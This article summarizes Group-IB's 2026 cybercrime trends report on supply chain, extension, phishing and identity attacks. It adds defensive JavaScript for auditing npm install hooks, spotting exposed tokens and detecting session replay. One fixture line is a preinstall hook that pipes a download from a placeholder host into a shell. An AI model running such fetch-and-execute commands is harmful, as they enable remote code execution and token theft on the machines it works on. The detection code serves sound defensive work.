Digital infection strikes its chosen targets in a brutal domino effect.

In 2025, supply chain attacks stopped being rare incidents and became a systemic threat. In its new report, High-Tech Crime Trends 2026, Group-IB describes how attackers increasingly target not just endpoints but software vendors, SaaS platforms, and contractors in order to reach hundreds of organizations at once. This approach changes the very logic of cybercrime and blurs the boundaries between individual incidents.
The report's authors emphasize that trust has become the primary vulnerability: a compromise of a single vendor or popular library can trigger a domino effect that reaches thousands of downstream customers. According to the study, IT, financial services, and transportation were the sectors most targeted in 2025. The ten most frequently targeted countries include the United States, Australia, France, the United Kingdom, and Japan.
Special attention is given to attacks on open source. Attackers published malicious packages, hijacked developer tokens, and released self-propagating worms into the npm ecosystem and other registries. The Shai-Hulud campaign affected hundreds of packages, and its second wave expanded to nearly 800 libraries. These compromises stole GitHub tokens, npm credentials, and project files, which were then used to push malicious code further downstream.
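To make this concrete, here is an added example, not code from the report or from any project it names, showing two checks a team can run on a CI runner or developer machine: listing every dependency that carries an install-time lifecycle script (the mechanism self-propagating npm malware generally relies on to execute during install) and scanning the environment for GitHub and npm token shapes, which are exactly what such scripts harvest. The package metadata and environment values are constructed for the demo, and INSTALL_HOOKS, findInstallHooks and findExposedTokens are names chosen here.

```javascript
// Added example (not from the Group-IB report): audit an npm dependency tree for
// install-time lifecycle scripts and for credentials those scripts could harvest.
// Every package entry and environment value below is constructed for the demo.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Constructed package.json contents keyed by "name@version", as they would be read
// from node_modules/<name>/package.json after an install.
const SAMPLE_PACKAGES = {
  'left-pad@1.3.0': { name: 'left-pad', version: '1.3.0' },
  'color-utils@2.4.1': {
    name: 'color-utils', version: '2.4.1',
    scripts: { postinstall: 'node setup.js', test: 'jest' },
  },
  'build-helper@0.9.2': {
    name: 'build-helper', version: '0.9.2',
    scripts: { preinstall: 'curl -s https://example.invalid/x | sh' },
  },
};

// Return every install-time hook in the tree. Legitimate postinstall hooks exist
// (native builds, for instance), so this is a review list, not a verdict.
function findInstallHooks(packages) {
  const findings = [];
  for (const [id, pkg] of Object.entries(packages)) {
    const scripts = pkg.scripts || {};
    for (const hook of INSTALL_HOOKS) {
      if (!scripts[hook]) continue;
      findings.push({
        id,
        hook,
        command: scripts[hook],
        // A hook that fetches remote content and pipes it into an interpreter
        // deserves the closest look.
        remoteExec: /\b(curl|wget)\b.*\|\s*(sh|bash|node)\b/.test(scripts[hook]),
      });
    }
  }
  return findings;
}

// Token shapes a credential-stealing install script looks for on a developer
// machine or build agent. Prefixes follow the public GitHub and npm token formats.
const TOKEN_PATTERNS = [
  { kind: 'github-pat', re: /\bghp_[A-Za-z0-9]{36}\b/ },
  { kind: 'github-fine-grained', re: /\bgithub_pat_[A-Za-z0-9_]{22,}\b/ },
  { kind: 'npm-token', re: /\bnpm_[A-Za-z0-9]{36}\b/ },
];

// Scan a process environment (object of name -> value) for token-shaped secrets.
function findExposedTokens(env) {
  const hits = [];
  for (const [name, value] of Object.entries(env)) {
    for (const { kind, re } of TOKEN_PATTERNS) {
      if (re.test(String(value))) hits.push({ variable: name, kind });
    }
  }
  return hits;
}

// Constructed environment; the token values are placeholders, not real secrets.
const SAMPLE_ENV = {
  PATH: '/usr/bin:/bin',
  HOME: '/home/ci',
  GITHUB_TOKEN: 'ghp_' + 'a'.repeat(36),
  NPM_TOKEN: 'npm_' + 'b'.repeat(36),
};

console.log('install hooks:', findInstallHooks(SAMPLE_PACKAGES));
console.log('exposed tokens:', findExposedTokens(SAMPLE_ENV));
```

A postinstall hook is not evidence of compromise by itself, so the first list is for review, not for blocking. Setting ignore-scripts=true in .npmrc and re-enabling scripts only for the few packages that genuinely need them removes the execution path entirely, and tokens that must live in environment variables on build agents should be short-lived and scoped to the minimum the job needs, so a harvested token buys the attacker as little as possible.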
Browser extensions have also become a convenient entry point. The report describes a counterfeit version of the Trust Wallet Chrome extension that compromised 2,520 wallets and caused losses exceeding $8.5 million. In another incident, attackers used phishing to take control of the Cyberhaven extension and injected malicious code, affecting hundreds of thousands of users as part of a larger campaign.
Phishing has evolved to steal OAuth tokens and session data, bypassing multi-factor authentication. Phishing-as-a-Service kits such as Tycoon2FA proxy the login flow and capture Microsoft 365 and Gmail session data. At the same time, fully automated spam distribution services built on generative AI have emerged; they tailor emails to specific targets and help evade filters.
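The following is an added example, not from the report, of the detection logic a SOC could run over identity-provider sign-in logs to spot the trace that session-stealing phishing leaves behind: a session established with MFA from one network and then reused from another network without a fresh MFA event. The events, field names and the detectSessionReplay function are constructed for the demo and do not follow any particular vendor's log schema.

```javascript
// Added example (not from the Group-IB report): flag session tokens reused from a
// different network shortly after an MFA-satisfied sign-in, the footprint left when
// a phishing kit replays a captured session. Events and field names are constructed.

const REPLAY_WINDOW_MS = 6 * 60 * 60 * 1000; // look six hours past the original sign-in

// Constructed sign-in events: one per request, tied together by session identifier.
const SAMPLE_EVENTS = [
  { ts: '2025-03-04T09:02:11Z', user: 'alice', session: 'S-100', ip: '203.0.113.10', asn: 'AS64500', mfa: true,  kind: 'interactive' },
  { ts: '2025-03-04T09:05:40Z', user: 'alice', session: 'S-100', ip: '203.0.113.10', asn: 'AS64500', mfa: false, kind: 'non-interactive' },
  { ts: '2025-03-04T10:15:02Z', user: 'bob',   session: 'S-200', ip: '198.51.100.7', asn: 'AS64501', mfa: true,  kind: 'interactive' },
  // bob's session shows up from another network eleven minutes later with no new MFA
  { ts: '2025-03-04T10:26:30Z', user: 'bob',   session: 'S-200', ip: '192.0.2.55',   asn: 'AS64502', mfa: false, kind: 'non-interactive' },
  { ts: '2025-03-04T10:27:01Z', user: 'bob',   session: 'S-200', ip: '192.0.2.55',   asn: 'AS64502', mfa: false, kind: 'non-interactive' },
];

// Group events by session, find the MFA-satisfied interactive sign-in that created
// each session, and report any later non-MFA use of that session from another ASN
// inside the window. Returns one alert per affected session.
function detectSessionReplay(events, windowMs = REPLAY_WINDOW_MS) {
  const bySession = new Map();
  const ordered = [...events].sort((a, b) => Date.parse(a.ts) - Date.parse(b.ts));
  for (const e of ordered) {
    if (!bySession.has(e.session)) bySession.set(e.session, []);
    bySession.get(e.session).push(e);
  }

  const alerts = [];
  for (const [session, evs] of bySession) {
    const origin = evs.find(e => e.mfa && e.kind === 'interactive');
    if (!origin) continue; // no MFA origin: nothing to compare against
    const originTs = Date.parse(origin.ts);
    const foreign = evs.filter(e =>
      e !== origin &&
      !e.mfa &&
      e.asn !== origin.asn &&
      Date.parse(e.ts) - originTs <= windowMs);
    if (foreign.length === 0) continue;
    alerts.push({
      user: origin.user,
      session,
      originAsn: origin.asn,
      replayAsns: [...new Set(foreign.map(e => e.asn))],
      firstReplayMinutes: Math.round((Date.parse(foreign[0].ts) - originTs) / 60000),
    });
  }
  return alerts;
}

console.log(detectSessionReplay(SAMPLE_EVENTS));
```

A network change on its own is noisy (mobile carriers and VPNs change ASN constantly), so this is a triage signal to be combined with device and geolocation context rather than an automatic block. The structural fix is phishing-resistant MFA such as FIDO2 keys, which bind the authentication to the origin and leave a proxying kit with nothing to replay, together with short session lifetimes so that a captured cookie expires quickly.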
The report documents an increase in the abuse of synthetic identities. North Korean IT workers, operating under various pseudonyms, obtained jobs at foreign companies using fake résumés and deepfake interviews, which gave them long-term access to corporate infrastructure and partner integrations.
Notable incidents in 2025 include the compromise of legacy Oracle Cloud infrastructure, where an attacker using the handle rose87168 claimed to have obtained data on roughly 6 million users. Analysis of the sample revealed more than 1,700 unique domains and records valid as of February 2025. Another example is the chain of compromises affecting Salesloft, Drift, and Salesforce via stolen OAuth tokens, which gave access to customer data at several large companies.
Group-IB also reported supporting 52 law enforcement agencies in six international operations. As a result, 1,809 individuals were detained and more than 34,000 malicious resources were taken down. The company estimates that the confirmed damage from cybercrime exceeded $100 million.
The report's authors conclude that in 2026 supply chain attacks will become even more automated and harder to detect. AI will shrink the time from compromise to exploitation to hours or even minutes, and the primary targets will remain tokens, API keys, and integrations that let attackers blend into legitimate processes.